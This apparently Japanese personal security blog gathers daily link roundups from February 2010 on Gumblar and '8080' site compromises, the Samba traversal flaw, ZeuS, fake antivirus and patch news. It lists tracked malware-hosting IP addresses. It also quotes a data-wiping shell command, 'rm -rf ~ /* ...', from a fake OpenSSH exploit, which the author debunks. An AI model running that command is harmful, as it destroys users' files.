UnderForge of Lack

2010.02.09 火曜日

gnome — Tue, 09 Feb 2010 00:11:05 +0000

ふくの日

下関では、河豚は「ふく」と発音する。

漫画の日

漫画家・手塚治虫氏の命日に因み漫画本専門古書店「まんだらけ(2652)」が制定。

風の日 (風がふく[29])
服の日 [29]
福の日 [29]
肉の日（特売！それは毎月29日！）
日本航空350便墜落事故 1982年 a.k.a 逆噴射事故
えひめ丸事件

----------

細かいのがいっぱい・・・

----------
Samba
Vulnerability in Samba provides access to files
Attackers can even get access to the system's root directory (/). To exploit the flaw (directory traversing), attackers first have to have an account on the Samba server that includes write access to at least one share.
典型的なディレクトリ・トラバーサルですね
もっとも、アクセス可能な実アカウントか、ゲストに対しても書き込み可能な共有領域（！）が必要の様子。
Samba Remote Exploit // by Kingcope in 2010
長いし、要領得ないし、何より音楽が変・・・
I added some nice greek tune so turn your speakers on (or off). OFF 推奨（笑）

Claimed Zero Day exploit in Samba
Quick FAQ: What do I do !
Set:
wide links = no
in the [global] section of your smb.conf and restart smbd to eliminate this problem.

----------
Gumblar(本物)
Bollywood Hungama Web Site Compromised
どっかで見たことのあるスクリプトですよね？

感染サイトを見つけて、いろいろwgetを試みたのですが、上流が停止しているのか、IPがブロックされているのか、何も降ってきませんね～　ScanSafeも、Kasperskyも沈黙しているので詳しい情報もあまり入ってきませんし、MDLのフォーラムでもイマイチな反応です。

2010年2月「Gumblar.x」の改ざん攻撃再開・続報 -- 無題なブログ
今現在、日本の陥落サイト４０ヶ所をチェッカーで監視してます。
nooo_spam様の監視体制はすごいなぁ
うちにあった陥落リスト１０個は全部クリーンアップされていました。

※いつものことですが、スクリプトやペイロードはコロコロ変わるので、脆弱性の穴をふさいでおくことが基本対策です。

----------
8080
インジェクション 8080のアクセス制御？
同一IPアドレスで数日後にアクセスしないとコンテンツ（＝検体）がダウンロードできない
こっちも、ケチケチ作戦（仮称：なかなか検体をくれない）の余波でちっとも解析できないようです・・・

「一見さん」のみが感染するというのが、最近の拡散のトレンドなのでしょうか？（苦笑）

----------
Tata down
タタといえば、あのタタ・モーターズを含めたインド屈指の財閥ですが、「インドへのIT外注」の先駆の一つともいえるタタ・コンサルタンシー・サービシズのウェブサイトが・・
Cheeky French hackers hijack Tata website

またこのテですか・・
しかし、「French hacker」と断じるにはちょっと情報不足な気もしますネ

----------
中国がんばってます
Operation Auroraで、中国の話が盛り上がったわけですが、その後の経緯とかは政治色に糊塗されてしまった感があり、生煮え終了な感じがしなくもないわけですが・・
中国そのものはCNNICの審査強化やらで結構がんばっている印象です。
China shuts down cracker website
"Black Hawk Safety Net" site have been arrested.
こないだの暗黒工作組よりはセンスあるかもネ・・

A 20-year old student told China Daily, "Basically students were told how to steal accounts and use trojan programs.
いやな日常会話だなぁ・・"

----------
Think B4 U post!
Sunbelt supports Safer Internet Day: Think B4 U post!
For example, photos, once posted online, remain online and can be seen by anybody, even years after they have been posted. Therefore, children and teenagers need guidance to manage their online identity in a responsible way, to be in control of their own online identity.
この標語はいいですね。
特に未成年の場合、自分の写真などを安易に公開することの危険性を認識するための教育（ないしはそのプロセス）は極めて重要です。

日本だとどこのセクションが担当するんでしょうね、コレ？
この人？

----------
釣りセミナー
◆◆フィッシング対策セミナー資料公開のお知らせ◆◆
日本国内における、フィッシング対策のセミナーの資料が公開されました。
（※ただしPDF）

----------
PPDF
Watch out for flower-show.org
まだやってた(2010.01.08 金曜日)のか！？

Adobe Readerのゼロデイは既に塞がれて居ますので、最新版にアップデートしてください。

----------
XP Internet Security, Vista and 7
FakeAV Uses False “Microsoft Security Updates”
Troj/FakeAv-AUF poses as the Windows Automatic Update facility and purports to install an update named XP Internet Security.
ふーん、XPだけか～

ご心配なく（！？）、ちゃんと、XP以外のものもあります
How to remove XP Internet Security 2010(以下略）

Antivirus Vista 2010
Vista Antispyware 2010
Vista Guardian
Vista Antivirus Pro
Vista Internet Security
Vista Internet Security 2010
XP Guardian
XP Antivirus Pro
XP AntiSpyware 2010
XP Internet Security
XP Internet Security 2010
Antivirus XP 2010
Antivirus Win 7 2010
Win7 Guardian
Win 7 Antivirus Pro
Win 7 Antispyware 2010
Win 7 Internet Security
Win 7 Internet Security 2010

いや・・・無くていいんですが・・・

----------
時間切れ気味なので、快速(Rapidly)～

----------
またカード窃取？
モンベルウェブサイト、不正アクセス受けカード情報盗難か

ttp://www.montbell.jp/
また一枚絵・・・
状況が確定していない中での速報情報となりますが、2009年11月以降にモンベル・オンラインショップをご利用いただいたお客様について、クレジットカード情報が窃取された可能性があり
期間長いですね
SQLインジェクションかな？

「モンベル」サイト、不正アクセス被害…カード情報盗難？

----------
WoW
WoWってそんなに流行ってるんですか？
worldrofwarcraft.com
　「World of Warcraft」オンラインゲームは、世界に1000万人以上のプレイヤーを擁している。
「World of Warcraft」には、これを標的とし、エンドユーザのログイン情報を盗もうとする、何百ものフィッシングWebサイトもある。

----------
BlackHat 2010 DC+ by IBM XForce
My Blackhat DC Paper, Slides, and Video are available
Exploiting Lawful Intercept to Wiretap the Internet

----------
ネカフェチェッカー
Are you from an Internet cafe?
These processes are related to popular administration software used in Internet cafés in China. If any of these processes are found, obviously, the affected system is most likely from an Internet café.
怖い怖い・・・
一昔前の韓国(aka PC房)の混乱みたいな感じなのでしょうかね？
TrojanDownloader:Win32/Chekafe.A

----------
ZeuS キャンペーン続報
Zeus Campaign Targeted Government Departments
本気でサイバー戦争仕掛ける気なのかしらん？

関連？：
Distributing malware through Facebook
あいかわらず・・

----------
ケス・デバーニュ
どっちかっていうと自転車の印象しか無かった、Caisse d'Epargne(仏)ですが、釣りには気をつけましょう～ということで
Caisse d’Epargne Customers, Beware!

類似：
Phishing Pages Pose as Secure Login Pages
Next, a secure login page always has a padlock icon on the lower-right portion of the page while the fake page only has an exclamation point, indicating that something is wrong.
重要な情報を入力する際には、指呼確認が必要です（笑）

----------
消してない
Google Chrome leaves old versions behind when updated?
Can the folder 3.0.195.38 be deleted safely?
たぶん・・
[comment]No, it does not pose a security threat (the .dlls have been unregistered)

----------
by Secunia

httpdx "f_command()" FTP Command Format String Vulnerability 4
[UNpatched]
Use in trusted networks only. Block access to the FTP service.
via : httpdx v1.5.2 Remote Pre-Authentication DoS (PoC crash)

odlican.net CMS Arbitrary File Upload Security Issue 4
[UNpatched]
Restrict access to the upload.php script (e.g. via .htaccess).

Oracle WebLogic Server Node Manager Unspecified Vulnerability 3
Apply the patches.
※昨日のパッチです。　Oracleは素早い！

----------
海賊版
ビジネスソフトや海外ドラマの海賊版販売、青森県十和田市の男を逮捕
このテも減りませんね・・

----------
ちゃんとノミネートするように！
Dave Marcus is ready for his Oscar
（笑）

----------
Open SSH!?
（気分的に）イヤだった SFTP(SSH-L2)への移行を進めている最中なのに
When is a 0day not a 0day? Fake OpenSSh exploit, again.
え”～～！？
と思ったら・・・

"rm -rf ~ /* 2> /dev/null &"
おいおいおい・・
こんなもん実行できるわけないでしょうに（汗）
いや、rootアクセスを許してればっ・・ってそれじゃ権限昇格じゃないしっ！（苦笑）

Lesson four, just because something is posted online does not mean anyone has actually checked the facts or performed QA on the code.
こうして PoC が FUD として蔓延していくのですね～
Do the research and analysis before crying wolf.
怖い怖い

※OpenSSHに、「確認されている0-day exploits」は現時点では無いと思われます。
と書いておかないとまた問題になりそうだ・・

----------
不思議だっ！

レンキン教授と不思議な卵

４つ割れてる気もしないでもないけど、減ったのは６個、使ったのは３個
6-3=4!?

最近作った失敗作：
固形化したメレンゲ（orz）

----------
8080
78.41.156.236 AS6908(DATAHOP)
89.105.199.130 AS24875(NL-ISPSERVICES)
91.121.96.181 AS16276(OVH Paris)
91.121.112.227 AS16276(OVH Paris)
94.23.199.154 AS16276(OVH Paris)

今日は（チェックしているところは）全部同じラウンドロビンに収束。

----------
Google Safe Browsing
| 1265659225 | B | [goog-black-hash 1.50610 update]
| 1265659202 | M | [goog-malware-hash 1.19228 update]
| 321177 | -814(321991) 微減
| 1347320 |

----------
明日はマイクロソフトの（パッチの）日

EoF

2010.02.08 月曜日

gnome — Sun, 07 Feb 2010 23:18:39 +0000

郵便マークの日

この経緯に関しては、諸説あることで知られている。

「T」を第一案とし、「テイシンショウ」の片仮名の「テ」を図案化した「〒」を第二案として提出したところ、第二案の「〒」が採用された。しかし、告示の時「T」と誤ってしまったために、これを訂正した、という説。
「T」にすることで最初から決まっていたものの、後日調べてみると「T」は国際郵便の取扱いでは、郵便料金不足の印として万国共通に使用されていた。そのため、これによく似たマークは適当ではないということで、「〒」に訂正した、という説。また、この訂正では、「テイシンショウ」の片仮名の「テ」からの説と、単純に「T」の上に一本足して「〒」とした、という説の2つがある。

針供養
ロカビリー(RAB)の日 (Elvis Presley Jailhouse Rock 1957)
ホテルニュージャパン火災(1982年)

----------

月曜朝なので、何も無いはずっ！

----------
txsBBSPY
BlackBerry Spyware Can Intercept Texts, Email, Track User's Location
A security researcher demonstrated a spyware program at the ShmooCon conference on Sunday that is capable of intercepting and recording text messages, emails, Web traffic and other data sent to and from BlackBerry devices.
demo: TXSBBSpy Demo(13min)（ながい・・）
盗む対象に
and disconnected calls and track the device's GPS coordinates in real time
と、リアルタイムの位置情報が入っているのが素敵（！？）ですね。

自動的にインストールされる性質のものではありませんので、過敏になる必要はありませんが、スマートフォンへのアプリケーションの導入は少し慎重になったほうがよさそうです。
Is Your BlackBerry App Spying on You?

----------
Oracle out-of-band patches
Oracle Security Alert for CVE-2010-0073
work-aroundとおもっていたら既にパッチが出ていました。

Oracle Releases Security Alert for WebLogic Server Vulnerability
Unscheduled patch from Oracle

----------
APT
Googleの騒ぎからこの用語を目にすることが多くなりました。
大手企業や政府・公共団体機関で、こうした大規模な（特に基幹インフラを狙ったような）攻撃のレポートに興味のある方は、M-Trendsのレポートを精読してみるのもいいかもしれません。

Mandiant Mtrends Report
Once again a lazy weekend to catch up on some reading.
私は lazyなので遠慮します（笑）
or just more FUD (Fear, Uncertainty, and Doubt) added to the pile?
となりませんように

----------
読み物：skype and security
Skype Security: Is the Popular VOIP Service Safe for Business?
Q&A形式で、わかりやすいです。

関連：
iPhone用「Skype」"3G回線通話"にまもなく対応 - iPad用も検討中

----------
DNS-BH
CMSに何かトラブルのあった様子だった DNS-BHが復旧されています。
よかったよかった

2010-02-05 Update: rogue domains, zeus domains, exploit domains
Added rogue domains, zeus domains, exploit domains.
Sources include www.malwareurl.com, www.malwaredomainlist.com, malc0de.com, and others:

私はもう、焼却炉の管理ができそうに無いのでそろそろ消して、DNS-BHさんに任せようかな？と思っています。
※特に De-List が難しい
Site delisting: checksix-fr.com

企業で使っていて、役に立っていると考えている方は、寄付も検討してネ。

----------
IPOとデートサイトの関係？
You’d think a company pursuing an IPO in this economy would clean up its act
IPO(公開株式) and Adult FriendFinder
なんというか、マルウェアの手法とあまり変わりませんね・・・

----------
DELETED
１コ

申し訳ありません。

----------
8080
第一系統
NEW IP (as usually) OVH
91.121.96.181 AS16276(OVH Paris)
NEW IP (as usually) OVH
91.121.112.227 AS16276(OVH Paris)

78.41.156.236 AS6908(DATAHOP)
85.25.152.241 AS8972(PLUSSERVER)
94.23.199.154 AS16276(OVH Paris)

第二系統(重複除外)
NEW IP/ISP
89.105.199.130 AS24875(NL-ISPSERVICES)
213.251.164.84 AS16276(OVH Paris)

第三系統(重複除外)
77.68.44.169 AS15418(FASTHOSTS)
78.31.107.49 AS24931(DEDIPOWER)
188.40.118.68 AS24940(HETZNER)

まだまだ弾薬が残ってるなぁ・・
OVHはISPの管理パスでも漏洩してるのでしょうか？（本当にマルウェア管理者の運営だったら恐ろしい）

----------
Google Safe Browsing
| 1265572830 | B | [goog-black-hash 1.50538 update]
| 1265572802 | M | [goog-malware-hash 1.19204 update]
| 321991 | +7595(314396) 反転増加中
| 1344685 |
EoF

2010.02.07 日曜日

gnome — Sun, 07 Feb 2010 01:14:34 +0000

北方領土の日

安政元年12月21日（新暦1855年2月7日）に日露和親条約が結ばれた。

長野の日

1998年、長野冬季オリンピックの開会式が行われた

福井県ふるさとの日
フナの日

----------
訂正
comment - “2010.02.04 木曜日”
ワンタイムパスワードトークンの導入はFFXIよりWoWのほうが先でした。
774様ありがとうございます。
トークンはてっきり FFが先だとおもっていました～

----------

日曜ですし何もない・・・よね？

----------
Wordpress something wrong?
WordPress iframe injection?
the compromise resulted in the injection of some obfuscated javascript that created a hidden iframe.
may be a permission problem or perhaps some sort of SQL injection issue with joomla or the tinymce editor (at least, that is what the log entries showed that someone is looking for).
怪しいログ：
GET /joomla/plugins/editors/tinymce/jscripts/tiny_mce/license.txt

Juumla!を使用中の方、もしくは、WordPressでTinyMCEを使っている方は、ログをチェック、システム内に存在する phpファイルを確認してみてください。
※TinyMCEは、予期せずインストールされている場合があります。

TinyMCE FileManager HACK

----------
.jpはいいけど・・
“.日本”と“.jp”は登録者を一致させるべき--ドメイン管理運用の業界団体が意見書
このほど表明した意見書では、“.日本”ドメインの導入にあたって利用者が混乱しないよう“.jp”と登録者を完全に一致させた上で、“.jp”と同程度の安全性と安定性が図られるべきだと主張している。
「？」
よくわからないけど、.jpを取ったら強制的に .日本も取らされるとか？

というかUnicodeドメインは、~~WinXP~~ IE6 が駆逐されるまでヤメてほしいんですけどね～
※素で間違えました。申し訳ありません。
ユニコードドメイン（国際化ドメイン）の問題は
国際化ドメイン名のフィッシング詐欺はブラウザの責任ではないとJPRSが見解
このへんかな？

----------
読み物：MacOS X の物理メモリ解析
Memory Analysis - time to move beyond XP
Mac OS X Physical Memory Analysis
Mac OS X Physical Memory Analysis(White Paper)
ほえ～
MacOSって別次元のものかと思ってましたけど、こうしてバラされると、BSD系Unixも色濃く混じってる(Darwin)んだなぁっと感心。

----------
ZeuS は .govやら .milをターゲットにしている？
Zeus Attack Spoofs NSA, Targets .gov and .mil
誤訳すると激しく恐ろしいセクションなので慎重に読んでみてください（笑）
Criminals are spamming the Zeus banking Trojan in a convincing e-mail that spoofs the National Security Agency. Initial reports indicate that a large number of government systems may have been compromised by the attack.
NSAの諮問機関のひとつ NICから、「ZeuSのようなもの」が送信されており、米政府内、もしくは軍へのスピア型攻撃に使用されているのではないか？　という話・・
2020.zip.txt 16/39 (41.03%)

----------
瓦はどこへ？
「iPad」関連のうわさを答え合わせ--予想の的中率は？
個人的に iSlate は結構よかったんですが、やっぱり一般的な用語ではなかったようで・・
そういえば富士通の件はどうするんでしょうね？

----------
Facebook
New Facebook Home Page, Important New Privacy Setting

Facebook やっと本格的なWebメールをサポート–Gmailキラーと騒ぐ人たちも
Facebook Connectと個人名URLをベースとして、本格的なWebメール製品を使える…これにはGoogleも震え上がるかもしれない。ほんとにGmailキラーか？　そうは思わないが、強力な製品であることは確かだ。
Gmail(Google Apps)とはちょっと違うような・・

----------
フォレンジック製品のページがガンブラー'ed
個々の陥落サイトを挙げるのは既に止めてますが、スルーカ＜事態なケース
NetEvidenceサイトの改ざんに関するお詫びとお知らせについて
フォレンジック製品のページが陥落ってのもアレですが、どうせなら、導入していた「フォレンジック」を駆使して、改ざんの経緯、経路、インパクトなどを公表して欲しかったですね。

ttp://www.netevidence.jp/products/
全ての通信データを記録・保存・解析するネットワークフォレンジックサーバ「NetEvidence」
「NetEvidence」は企業のネットワーク上で使われるパソコンからの電子メール、Webブラウザを使ってのウェブサイト閲覧、ファイル転送を行なうFTPなど、社外へ流れるすべての通信データを記録・解析・保存するネットワークフォレンジックサーバ製品です。
記録、保存した通信データは、Webブラウザの管理画面から閲覧・解析・調査が可能。技術に詳しくない方でも簡単に管理・調査が行なえます。
御社の貴重な情報の漏えいを抑止するとともに、万一漏えいが発生した場合における漏えい者の特定と証拠保全ができる装置（アプライアンス）です。

医者の不養生？
というか、同様のビジネスを展開していることも含め、フォレンジック・ビジネス全体の信頼低下につながると思うんですが、どうなんでしょ？

フォレンジックとは、参考：
内部不正による情報漏えいを許さない(前編)
フォレンジックで内部不正を発見せよ(後編)

----------
チクったろ（笑）
Technorati.com の広告が腐ってる -- てくてく糸巻き
コンテンツはありません。
（なんでoverture、つまりヤフー（日本）の審査で許可が通るんでしょうね）
これはヒドい・・
たぶん米国内に日本語の審査担当が居ないんでしょうネ

うちのメンバーに、学校関係者(ちょっと伝言ゲームになるけど)がいるので、チクっておくように依頼しておこうっと

用語
　MfA : Make for Adsense
　アービトラージ : Arbitrage sites (Google用語?)
コンテンツ連動広告で稼ぐ人々(1) - MFAサイトとは？ -- 2006.11

----------
8080
第１
*NEW* IP as PLUSSERVER
85.25.152.241 AS8972(PLUSSERVER)
78.41.156.236 AS6908(DATAHOP)
84.200.227.144 AS31400(ACCELERATED)
94.23.199.154 AS16276(OVH Paris)
94.199.240.61 AS39023(IU-AS)

第２
77.68.44.169 AS15418(FASTHOSTS)
78.31.107.49 AS24931(DEDIPOWER)
82.165.47.29 AS8560(SCHLUND)
87.118.90.76 AS31103(KEYWEB-AS)
217.160.110.21 AS8560(ONEANDONE-AS)

第３（重複除外）
188.40.118.68 AS24940(HETZNER)
213.251.164.84 AS16276(OVH Paris)

第４・・・・
80.69.74.73 AS20857(TRANSIP)
91.121.4.99 AS16276(OVH Paris)
91.121.86.130 AS16276(OVH Paris)
94.23.4.164 AS16276(OVH Paris)
217.23.5.27 AS49981(WORLDSTREAM)

というわけで、cache の関係か何か不明ですが、４系統に分離・・
もうタスケテ・・

----------
Google Safe Browsing
| 1265504418 | B | [goog-black-hash 1.50481 update]
| 1265504405 | M | [goog-malware-hash 1.19186 update]
| 314396 | -1734(316130) 利益確定売り（違！）
| 1334372 |
EoF

2010.02.06 土曜日

gnome — Sat, 06 Feb 2010 02:48:34 +0000

海苔の日

全国海苔貝類漁業協同組合連合会が全国海苔漁民の総意として1966年に制定。
大宝元年（701 年）に制定された日本最古の成文法典である「大宝律令」によれば、29種類の海産物が租税(租庸調)として納められ、そのうち8種類が海藻で、海苔がその1つとして表記されている。
※第12回　黒い紙　剣千年 -- スーパー源氏

御燈祭（和歌山県新宮市）
抹茶の日
愛知県の西尾市茶業振興協議会が西尾茶創業120年を記念して制定。

お茶についてのお話５

ブログの日

サイバーエージェントが2007年、語呂合わせで「ブログの日」と定める。

----------
いい仕事してますね
©中島誠之助氏
「ガンブラー攻撃」対象ソフトをJPCERTが確認～サイト管理者の注意点は？
書こうかなぁとか思ってたことが全部、しかも美しく書かれていたので、感激しました。
「中の人」は判るとおもいますが、FTPのパスワード変更って実は結構大変なんですよね（あちこちにネゴとらないといけないので）・・・で、外注側からなかなか言いにくい面はあると思います。むしろ発注側が積極的に「パスワード管理はどうなってるんだ！？」と聞いてくれるのが理想なのですが（そういうところはとっくの昔にやってますよね）

特に重要なのは
・引越し後の旧サイトが改ざん
　新サイトのリンクを入れたトップページだけ残し、新サイトに引越し。その後、管理者のパソコンがウイルス感染してアカウント情報が盗まれ、トップページだけの旧サイトが改ざん。管理者は気付かず放置されたまま。
・テストサイトも改ざん
　制作中のテストサイトなのか、納品前のデモとして使用したのか、一目見てテストサイトとわかるサイトが改ざんされたまま放置。社名ロゴ付き（本体は別所ですでに運営中）のまま放置されている例も。
・改ざん対象は現行サイトだけではないので、過去に管理していたサイトにも注意を。
このへんは、もう ISPから指摘されないと気が付かないレベルにあります。また、テスト環境が陥落した場合、顧客にも（全く謂れの無い）迷惑がかかることにもなり、お互いの信頼関係にひびを入れることにもつながります。

自分の管理下にあるサーバを見直し、過去のテスト環境（StagingやDevelop）が残っていないか、仮に残っていた場合それは本当に必要なのか？　再チェックする良い機会です。
発注側は、外向け環境でテストしたサンプルサイトが残っていないか、今一度確認してみましょう。

※テスト、サンプルサイトを「Basic認証をかけているから大丈夫！」などと思っていると、陥落後に .htaccess を消されたりして目も当てられない事態になったり・・（苦笑）

----------
Firefox 公式配布Add-on にマルウェア
Security Issues With Two Experimental Add-Ons
Please read: Security Issue on AMO

Sothink Web Video Downloader (Version 4.0)
infected: PWS:Win32/Ldpinch.gen
Master Filer (all versions)
infected: Backdoor:Win32/Bifrose

※この PWS:Win32/Ldpinch.gen はかなり古いトロイで、少なくとも2008.02頃のものという話です（検体入手不能なので何ともいえませんが）
Malware infected Firefox Add-Ons – again

Firefoxエクステンション、トロイの木馬発覚
マルウェア検出ツールがMaster Filerの検出に失敗。新しく2つのマルウェア検出ツールを追加し全アドオンを再チェックしたところ、結果としてSothink Web Video Downloader 4.0にもマルウェアが含められていることが発覚したという。

チェックミスとはいえ、ちょっとこれは・・
なぜVirusTotalに投げなかったんだ？とか言われてますね（笑）

----------
UCC
Twitterでのキャンペーン告知に関するお詫び
UCC、Twitterでのキャンペーン告知を謝罪　複数アカウントのBOTでメッセージ送信
これだけ見て、自分も？だったのですが、
[Web] UCCがTwitterを使ってスパム行為!?
なるほど・・これはすごひどい・・
新サービスを何かに使うときは、しばらくリサーチしてからにしないと、「できること」と「やっていいこと」の境界が見えにくいことがあります。
UCC、Twitterを使用したPR活動で謝罪--botでキャンペーン告知を大量送付
「新しいコミュニケーションツールとして期待したが、理解が不十分だった。（botを起用したことについて）十分なリスクを検討できていなかった。今後はそれらを踏まえて、活動していきたい」
でもまぁ個人的にはドンマイ・・かな

私自身はTwitterを使いこなせてないのでなんとも・・

炎上マーケティングではなく焙煎マーケティングw
誰うま・・・！？

----------
User 2.0
そういえば、 Web 2.0 という言葉が形骸化したのはいつ頃でしょうか？
Dealing with User 2.0
So here is you homework for the weekend. How will you deal with User 2.0? How are you going to protect your corporate data without saying "Nay" to things like facebook, IM, own equipment, own applications, own …….? How will you sort data leakage, remote access, licensing issues, malware in an environment where you maybe have no control or access over the endpoint? Do you treat everyone with their own equipment as strangers and place them of the "special" VLAN? How do you deal with the Mac users that insist their machines cannot be infected? Enjoy thinking about User 2.0
どひゃ～
なんというイヤな宿題なんでしょう（苦笑）
telnetが死に、今 FTP が逝こうとしている中、次の命題はなんなんでしょうね？
※厳密なアクセス制御とホワイトリスティングかな？

----------
Oracleも
Vulnerability in Oracle 11gR2 allows system privileges for all
Overgenerous privileges for Java procedures allow users to escalate their own privileges, up to the point of gaining complete control over the database in Oracle's latest 11gR2 database release.
これも BlackHat ネタですね。

Oracle Security Alert for CVE-2010-0073

微妙に続く
----------
さよならは俳句で
OpenJonathan
Today's my last day at Sun. I'll miss it. Seems only fitting to end on a #haiku. Financial crisis/Stalled too many customers/CEO no more
Sun を率いた Schwartz 氏、『Twitter』で去就語る
Schwartz 氏は4日未明、Twitter で自身の去就を「つぶやいた」。
「今日は Sun にいる最後の日だ。寂しくなる。最後はやはり俳句で締めるのがいいだろう。金融危機 / 疲弊客はいと多く / CEO の職を去る」と同氏は書き込んだ。
これまでありがとう、そしてご苦労様でした。

Masaki Katakai's Weblog
このfaviconにも慣れないといけないのでしょうね

----------
また何か・・
An In-Depth Exploit Analysis on Multilayer Obfuscations
激しい難読化ですね・・

しかし使っているのは MDAC([MS06-014])しか確認できなかったようで、何とも言えません。

最近の悪意散布サイトは「1回だけよ」というケチなサイトが多く、ウィルス対策ベンダーも大変そうです。

----------
Adobe とToyota の共通点?
Dear Adobe: It's time for security rehab
どちらも一番ユーザにとって重要な部分を、比較的に見て軽視する傾向がある・・・のかな？

Toyota 問題は範疇外なのでアレですが、個人的にAdobeを擁護する気には、あまりなれません。
同時に、MSはAdobe製品がデファクト・スタンダードになっていることを認識し、Microsoft Updateに組み込んで欲しいと思っていますが・・・

----------
法案H.R.4061
サイバーセキュリティ法案、米下院を通過
米下院は、サイバー攻撃に対する政府の備えを充実させるために、訓練、研究、および調整の拡充を掲げたサイバーセキュリティ法案を圧倒的多数で承認した。

----------
Gumblar(本物)
このカテゴリーは妙にツボったので流用させていただきます(笑)
gumblar(本物) -- FFXI(仮)
Ilion様も書かれていますが、インジェクションの方法がかなり違うので、チェック箇所を誤らないようにしてください。

Gumblar(本物)のインジェクションは、URIのみの単純なスクリプトで、phpの後に半角の空白があるのが特徴です。これのイヤらしいところは、8080系と違ってインジェクションの飛ばし先も不特定多数の陥落サイト群なので、潰しても潰してもキリが無い点にあります。
※8080系もキリがないんですけど、nginxをインストールできる環境が限られているせいか、そろそろ攻撃側が引きそうな予感も

【サイト改竄報告】gumblar復活か？

----------
iPhoneのパスワードを忘れたら？
Cracking encrypted iPhone backups
悪用が怖いけどメモメモ

----------
今日の更新が遅れた訳
睡眠勤務
まさにこんな感じでした。
おかしいなぁ・・・書いてたつもりでテーブルに突っ伏して寝てたら8時半・・・しかも、書いてたつもりの txtは見当たらない・・・

だって手当無しだなんてそんな劣悪な会社がこのJapanにあるわけないじゃないですかァ！
あるわけないですよね！！！　・・・・・

書いちゃらめ～なネタなのでこの辺で CUT!（苦笑）

----------
8080
* NEW * ISP/IP
78.41.156.236 AS6908(DATAHOP)

78.31.107.49 AS24931(DEDIPOWER)
84.200.227.144 AS31400(ACCELERATED)
94.23.199.154 AS16276(OVH Paris)
94.199.240.61 AS39023(IU-AS)

2系統あったラウンドロビンが、今日は1系統のみ
こういうときは新たなドメインが生まれることがあるので注意しなければ・・
新ドメインを見つけた方は教えてください。

----------
Google Safe Browsing
| 1265418025 | B | [goog-black-hash 1.50409 update]
| 1265418001 | M | [goog-malware-hash 1.19161 update]
| 316130 | +7970(308160) ちょっとちょっと・・　増えすぎ！
| 1332178 |
EoF

2010.02.05 金曜日

gnome — Fri, 05 Feb 2010 00:13:45 +0000

長崎二十六聖人殉教の日
プロ野球の日

1936年、全日本職業野球連盟が結成され、プロ野球が誕生した。
当時の加盟チームは、東京巨人軍、大阪タイガース、名古屋ドラゴンズ、東京セネタース、名古屋金鯱軍、阪急軍、大東京軍の7チーム。

笑顔の日 [2-5]
ふたごの日 [2-5]

----------
[WARNING]
2010年2月「Gumblar.x」の改ざん攻撃再開 -- 無題なブログ
最近おとなしくなっていた「本家」Gumblar.x側も再開している模様です。
手持ちの陥落リストのサイトで再改ざんされたところは見当たらなかったのですが、しつこさには定評のあるgumblarですので更に手口を変えてくるかもしれません。
攻撃自体は
Analysis report for hXXp://enpucon.cl/
あまり代わり映えしない感じですね。
ひょっとしたら一部の Infectorだけが再起動したのかもしれませんが、いずれにせよ要注意です。

マルウェアマンスリーレポート : 2010 年 1 月
Gumblar の大流行については、2 回目である今回はかなり早く収束したと言えるでしょう。
言霊・・・

[セキュリティ]ガンブラー対策
逆FTP-DDoSとか、環境が整えば楽しいのかもしれませんね・・
（やっていいのかどうかは別ですが・笑）

続く
----------
一方、8080
TokyoSOCさんのほうからレポートがでていましたが
Gumblarと類似したWebサイト改ざんを利用する攻撃 -2010年1月検知状況-【Tokyo SOC Report】
PDFのヒット率が高いなぁ・・

また、JPCERT/CC のFTP Client 報告書を受け、いろいろ記事が飛び交っています。
保存したパスワードを盗むウイルスに注意、「ガンブラー」で感染
ガンブラー攻撃の対象ソフトをJPCERTが確認～アカウント情報盗み外部送信
自分が管理できる環境下は、「感染しないように」で済む話ですが、レジストリやテンポラリ領域の一時ファイルにCredentialが意識せずに残ると、忘れた頃に漏洩するというケースにつながりかねません。
FTPの接続情報は、基本的には保存しないようにするしかなさそうです。
※秘密鍵の登録可能なSSH(SFTP)環境の場合、必ずパスフレーズ付きの鍵を生成し、鍵認証を行ってください。できれば SSH1(SCP)は使用を避け、22番以外のPortを使用してください。
もっとも、キーロガーを埋め込まれてるなら何をやっても同じですが、そこまで墜ちている環境の話はやってもショウガナイですね・・・

----------
MEGA patch
おかしいな・・1月初頭はあんなに平和だったのに・・・
February 2010 Bulletin Release Advance Notification
ひ～ふ～み～の・・２６！？

Date: Wednesday, Feb 10
Time: 11:00 a.m. PST (UTC -8)

Microsoft Releases Advance Notification for February Security Bulletin

続く
----------
IEの情報流出
わざわざ保護モードを無効にしているユーザはともかく、残りは XP+IE6の話では？と思っていたのですが、割と広範な話なのかな？
[980088] Internet Explorer の脆弱性により、情報漏えいが起こる
回避策のセクションの、Internet Explorer のネットワークプロトコルのロックダウンの FixIt は、何をしますか?
Internet Explorer のネットワークプロトコルのロックダウンの FixIt は、file:// プロトコルを制限するので、スクリプトおよび ActiveX コントロールがインターネットゾーンで file:// プロトコルを使用して実行するのを防ぎます。
Fix IT: マイクロソフトセキュリティアドバイザリ: Internet Explorer の脆弱性により情報漏えいが起こる
ActiveX経由でローカルの file:// にアクセスされることって、結構あるんですけどね（特にダウンロードしないタイプのオンラインスキャン）
FixItすると、そのへんも動かなくなったりして（笑）<-- 試してません

IEに情報流出の脆弱性、Microsoftがアドバイザリー公開

フルパスでそのファイルの存在が特定できるケースというと、ユーザ名が漏洩した場合少し厄介かもしれませんね。
Releaseでコンパイルした実行ファイルにユーザ名が埋め込まれる

ちなみに、このExploit は BlackHat DC+2010で公表されたものだそうです。

----------
新ツールキット SpyEye
Botnet同士が仲が悪いのは、少ない（でもけっこうある）脆弱ノードのパイの取り合いをやってるから・・？
SpyEye Bot versus Zeus Bot
機能リストの中に・・・
Zeus killer
（笑）
まぁ、お互いにいがみあって潰しあってくれればいいんですけど、お互いに切磋琢磨するのはやめてください。

iframes are EVIL! Hate Zeus! -- October 26th, 2009

----------
pushdoじゃない！
そういえば、過去に特集(1 2 3 4 5)を組んで、Pushdoの権威だと思っていた TrendMicroが、今回のDDoSの件に何も言及していなかったので変だナとは思っていましたが・・・
The Pushdo Puzzle – DDoS or not DDoS?
we can affirm that this attack does not come from Pushdo.
あらら？
The common detection name used for this is Harebot or Shgray but there is a reason why people are putting the tag Pushdo onto this new threat. Some AV vendors are detecting it as Pandex and that was another name for Pushdo so that’s where the name association came from.
botnetの勢力圏マップもいろいろありすぎてよくわかりませんね・・・

----------
ああ・・もうヤメテ・・
Researchers penetrate last bastion of Windows security
DEPやASLRの保護下にあってもそれを無効化する JITスプレーという脆弱性攻撃の手法が紹介されました。
The "JIT-spray" allows attackers to overcome ASLR, which normally thwarts execution by picking a different memory location to load system components each time an operating system is started.
